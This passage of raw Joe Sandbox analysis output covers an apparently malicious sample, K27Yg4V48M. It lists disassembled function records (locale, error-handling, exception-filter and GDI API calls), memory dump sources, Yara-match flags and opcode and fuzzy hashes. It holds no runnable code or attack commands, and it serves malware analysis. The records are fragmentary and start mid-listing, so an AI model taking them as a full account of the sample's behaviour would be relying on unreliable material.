                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 021321A0
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321AD
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0213B900
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2955987475-0
                                                                                                    • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                    • Instruction ID: ff458c58de9d4de83c96a57c365507d7a266547de660e3e1e6d8aaf44725baac
                                                                                                    • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                    • Instruction Fuzzy Hash: 5C014932B95104DFCB15AF34DD80ABA33AADF04311F0441BAEE02EB281EB755E008B50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                    • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                    • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                    • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,00000006,?,02130A1C,?,0213BC4D,02130A1C,?,?,?,?,?,02130A1C,?,?), ref: 0213B61B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                    • Instruction ID: 409cbf2bead1de250123f47457ca4c9a92d09285078f9de6416ae87528b4e121
                                                                                                    • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                    • Instruction Fuzzy Hash: 55F046363047041FDB256F39DC80B7A7B92EF8072CF14402CFA458B651E7719D028B44
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0213047A,?,00000004), ref: 0213547A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                    • Instruction ID: 28617fb683296c5cedbe0ab7629355b4361d4129c909f9974094ce6d6a7c6c51
                                                                                                    • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                    • Instruction Fuzzy Hash: EAF096316C0318BFDB165F50DC01F6E7B67EF08F12F504155FD0566190DB729920AA99
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                    • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                    • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                    • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                    APIs
                                                                                                      • Part of subcall function 0212E654: RtlEnterCriticalSection.NTDLL(01CB0DAF), ref: 0212E663
                                                                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0213506C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                    • Instruction ID: 43a3ce084b3aab44c22dc2b705897bdad2142cecb77d82a5c9dd67dea25871df
                                                                                                    • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                    • Instruction Fuzzy Hash: CEF03C32A50304DFE710EF68D905B5D77E1AF09721F104266F904DB2E5C77599548F49
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                    • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                                                                    • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                                                                    • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,00000006,?,?,0213BCAB,02130A1C,?,?,?,?,?,02130A1C,?,?,?), ref: 0213B520
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2016158738-0
                                                                                                    • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                    • Instruction ID: 3e6dfe0570d958645738474788298e7647806f427e156f6af2e1a91c8d55ae93
                                                                                                    • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                    • Instruction Fuzzy Hash: B3F0553A34020857CB09AF36DC0476ABF91EFC1B64F0A005DEF0A8B290D3319942C790
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00410672,0210FE60), ref: 021108D2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                    • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                                    • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                                    • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                    • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                                                                    • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                    • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                    • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                    • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                    • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                    • Instruction ID: 79dafb742c2942f0e6218110c5ae893870c9316dbb92a1a01a710704e80ed25c
                                                                                                    • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                    • Instruction Fuzzy Hash: CFD196321481B34ACB2D4A39847413BFFE16A421A530E479EF8F7CA5C6EB24D57AD660
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                    • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                    • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                    • Instruction ID: 588cc1d215d51ead1e5d811aff9ee52e68c27780cc67c9d51aa5d839bb3cead6
                                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                    • Instruction Fuzzy Hash: AA912E722490B34EEB6D463E847413EFEE19A422A530B079EF4F2CA1C5EF249579D630
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                    • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                    • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                    • Instruction ID: 4ee6e77b1c26ed705d8a44250e4b188ccc466229a2e0734ad9d71cb3ade5618c
                                                                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                    • Instruction Fuzzy Hash: CB913D721490F34AEB6D467A853813EFEE19A422A530B079EF4F2CA1C5EF24C579D630
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                    • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                    • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                    • Instruction ID: 7d54d598a4ba3f4661fe4a23d5db2f6f4d7d39f6509938ec132853f2d8e1391d
                                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                    • Instruction Fuzzy Hash: EB9143722490B70ADB2D863D857413FFEE19A421A531A079EF4F2CA1C5EF24C57AD630
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                    • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                    • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                    • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                    • Instruction ID: 18f1b3e62b91fc0ed7f965e58d28324c4583aa8be2c3778b640f5d6b2fac3a83
                                                                                                    • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                    • Instruction Fuzzy Hash: 9C6177316C07385ADE386A68F890BBE73959F41B08F100439F982DB2C0E719D97EC756
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                    • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                    • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                    • Instruction ID: cdd485b74899d96c28e5f6c93ad5cb3009f981b40c8a7251c829935be6271881
                                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                    • Instruction Fuzzy Hash: 088152722490B74AEB6D463E847403FFFE15A422A530A179EF4F2CB1C5EF14927AD620
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                    • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                    • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                    • Instruction ID: 03fcd9e262dcd6b57fdcd6ed054387bc72ee744267645ffcfd767a3bab7bb786
                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                    • Instruction Fuzzy Hash: 21112B772C00B247D618863ED4B42BBE385EBC522872F927AF0414B75CD322E16DD630
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481462096.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_20c0000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                    • Instruction ID: 64592fecc61890881d7c8a6f8cbbc4fc98e1753d07a93bff0dcebbc31422e688
                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                    • Instruction Fuzzy Hash: 99112EB23402009FD754DF55DC81FAA73EAEB89324B2A8069ED04CB316D675E841D760
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                    • Instruction ID: d3147169a0349a9176419bc51c0031599c2ee13a83e26a4a9cefd83b6132c670
                                                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                    • Instruction Fuzzy Hash: 2301DB766506048FDF21CF24C854BBA33F5FB89215F5544B5E506D73C2E7B4A941CB90
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040214A
                                                                                                    • GetDC.USER32(?), ref: 00402151
                                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
